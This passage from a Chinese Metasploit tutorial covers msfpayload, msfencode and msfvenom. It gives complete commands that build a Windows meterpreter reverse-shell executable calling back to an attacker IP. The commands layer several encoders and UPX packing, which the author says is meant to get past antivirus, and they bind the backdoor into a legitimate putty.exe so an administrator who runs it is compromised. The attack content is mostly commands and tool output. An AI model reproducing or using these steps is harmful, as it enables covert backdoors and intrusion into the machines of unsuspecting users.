这样就会列出所有的payload
由于payoad类型太多,我们不知道如何选择适合自己的平台的payload,比如我们需要android平台下的payload,那么我们只需要执行以下命令
exploit@ubuntu:/pentest/framework3$ msfpayload -l| grep android [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager |
这样所有的android平台下的payload都可以查找出来了,再根据我们的系统平台环境和网络环境选择合适的payload。
有了合适的payload,但是我不知道需要设置哪些参数,那么我们就需要执行下面的参数,这样根据系统提示,我们可以进行我们下一步的操作
exploit@ubuntu:/pentest/framework3$ msfpayload android/meterpreter/reverse_tcp s [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ Name: Android Meterpreter, Dalvik Reverse TCP Stager Module: payload/android/meterpreter/reverse_tcp Platform: Android Arch: dalvik Needs Admin: No Total size: 8053 Rank: Normal Provided by: mihi egypt anwarelmakrahy timwr Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadAndroid true yes Automatically load the Android extension LHOST 192.168.189.134 yes The listen address LPORT 4444 yes The listen port RetryCount 10 yes Number of trials to be made if connection failed Description: Run a meterpreter server on Android. Connect back stager |
这样会提示我们需要设置哪些参数,如LHOST,LPORT,是否自动加载,重试连接次数,这样我们就知道下一步如何对我们的payload进行设置操作
这样我们就生成了android平台的apk后门文件,由于msfpayload可以生成不同平台,不同语言的payload,所以在渗透的时候,我们可以根据目标系统的环境,和网络环境,选择我们合适的payload和生成的文件格式。
接下来,我们继续介绍metasploit的另外一个比较重要的参数msfencode的用法
exploit@ubuntu:/pentest/framework3$ msfencode -h [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ Usage: /usr/local/bin/msfencode OPTIONS: -a The architecture to encode as -b The list of characters to avoid: '\x00\xff' -c The number of times to encode the data -d Specify the directory in which to look for EXE templates -e The encoder to use -h Help banner -i Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders -m Specifies an additional module search path -n Dump encoder information -o The output file -p The platform to encode for -s The maximum size of the encoded data -t The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war -v Increase verbosity -x Specify an alternate executable template |
这里我们就其参数做一一介绍:
-a 指定CPU 的类型,
-b 指定需要去除的字符,帮助中的示例00 ff 这两种数值在网络传送中会被截断造成传送失败
-c 指定编码次数,
-d 指定exe模板搜索路径,
-i 指定要编码的数据文件
-k 设置生成的文件运行后的payload进程与模板文件进程分离。
-l 列出可用payload
-n 输出编码器信息
-o 输出文件
-p 指定编码平台
-s 指定编码后的字节数(payload的)
-t 加密后文件的输出格式,支持以下格式:bash,c,c#,dword,java,js_be,js_le,数字型(num),perl文件,pl后缀文件,powershell格式文件,ps1格式文件,py,python,raw,rb,ruby,sh,vbapplaction,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small.loop-vbs.macho,msi,msi_nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,war
-v 显示当前msfencode的版本信息
-x 指定一个备用的可执行文件模版
msfencode可以对我们的payload进行加密,一般是和msfpayload配合使用,当然,也可以单独对已有的文件模版进行加密,支持多种文件格式,并且支持多种加密方式,这里我们先看看msfencode支持哪些类型的加密方式
exploit@ubuntu:/pentest/framework3$ msfencode -l [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/echo good Echo Command Encoder cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/perl normal Perl Command Encoder cmd/powershell_base64 excellent Powershell Base64 Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder generic/eicar manual The EICAR Encoder generic/none normal The "none" Encoder mipsbe/byte_xori normal Byte XORi Encoder mipsbe/longxor normal XOR Encoder mipsle/byte_xori normal Byte XORi Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 Encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/add_sub manual Add/Sub Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_underscore_tolower manual Avoid underscore/tolower x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/opt_sub manual Sub Encoder (optimised) x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder |
上面列出了可以用的加密格式和等级,还是要根据我们系统的安全级别,杀毒软件以及其他防护软件来选择我们合适的加密方式以便绕过这些限制措施。空谈误国,我们还是看看实际的操作。
首先,在我的本地有个a.exe,是我们其他工具生成的木马服务端,由于需要免杀,有没有专门做免杀的程序狗和逆向狗,没事,自己动手丰衣足食,用msfencode来解决你的困扰。
我们用msfpayload来生成一个反弹的程序,通过msfencode来进行加密,规避杀毒软件的查杀。
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t exe -o payload.exe [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [*] x86/shikata_ga_nai succeeded with size 308 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 362 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 389 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 416 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 443 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 470 (iteration=7) |
当然,这里只用了一种加密方式,经过了7次加密,也可以采用多种加密方式的多重加密,这样大部分的杀毒软件都变哑巴了
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/bloxor -c 3 -t raw | msfencode -e x86/countdown -c 5 -t exe -o av.exe [!] ************************************************************************[!] ************************************************************************[!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [*] x86/shikata_ga_nai succeeded with size 308 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 362 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 389 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 416 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 443 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 470 (iteration=7) [*] x86/bloxor succeeded with size 547 (iteration=1) [*] x86/bloxor succeeded with size 617 (iteration=2) [*] x86/bloxor succeeded with size 677 (iteration=3) [*] x86/countdown succeeded with size 695 (iteration=1) [*] x86/countdown succeeded with size 713 (iteration=2) [*] x86/countdown succeeded with size 731 (iteration=3) [*] x86/countdown succeeded with size 749 (iteration=4) [*] x86/countdown succeeded with size 767 (iteration=5) |
最后生成av.exe,这里我们可以测试一下生成的exe是否可以正常运行,丢到windows里面运行一下,请自行测试,我就不截图了。
如果运行正常,还不放心杀毒软件会干掉,那么我们再用upx加个壳?
exploit@ubuntu:/pentest/framework3$ upx -5 av.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 73802 -> 48128 65.21% win32/pe av.exe Packed 1 file. |
这种的生成的payload运行之后,没有什么反应,如果是作为渗透者自己来用的话,可能会做的比较隐蔽,有时候我们需要管理员或者目标主机上的其他人来触发这些payload程序,那么我们就需要用到比较隐蔽和猥琐的触发方式了,用标准的官方语言说就是:建立以标准文件模版为基础的payload文件,通俗点说就是搞个捆绑器,把shellcode我们正常的程序捆绑在一起,当管理员运行正常程序的时,就会触发我们的payload后门
a.exe是一个正常的putty程序,我们把shellcode和putty捆绑在一起生成一个新的程序
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -k -x /pentest/framework3/a.exe -o putty.exe [!] ************************************************************************[!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [*] x86/shikata_ga_nai succeeded with size 308 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 362 (iteration=3) |
可以看到我们生成了新的putty.exe,只需要替换掉原来的putty.exe即可,当管理员运行我们加工后的putty.exe时,就会触发我们的后门。
前面提到了,我们要对原本已经有的,比如通过其他的木马生成器生成的木马服务端进行免杀,那我们同样可以使用这样的模式来进行免杀,看实际的操作例子,这里的a是我们原始的putty文件,payload是我们生成的木马服务端,通过捆绑免杀,生成新的putty.exe
exploit@ubuntu:/pentest/framework3$ msfencode -i /pentest/framework3/payload.exe -e x86/shikata_ga_nai -c 5 -x -k /pentest/framework3/a.exe -o putty.exe [!] ************************************************************************ [!] * The utility msfencode is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ [*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 73860 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 73889 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 73918 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 73947 (iteration=5) |
接下来介绍msfvenom,msfvenom兼顾了msfencode和msfpayload的功能,所以将逐步替代msfencode和msfpayload,先看下参数
exploit@ubuntu:/pentest/framework3$ msfvenom -h Usage: /usr/local/bin/msfvenom [options] Options: -p, --payload Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled Prepend a nopsled of [length] size on to the payload -f, --format Output format (use --help-formats for a list) -e, --encoder [encoder] The encoder to use -a, --arch The architecture to use --platform The platform of the payload -s, --space The maximum size of the resulting payload -b, --bad-chars The list of characters to avoid example: '\x00\xff' -i, --iterations The number of times to encode the payload -c, --add-code Specify an additional win32 shellcode file to include -x, --template Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread --payload-options List the payload's standard options -o, --out Save the payload -v, --var-name Specify a custom variable name to use for certain output formats -h, --help Show this message --help-formats List available formats |
这里我们对msfvenom的参数一一解释
-p —payload 利用哪个payload来生成
-l —list 列出模块类型: payloads,encoders,nops,all
-n —nopsled
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
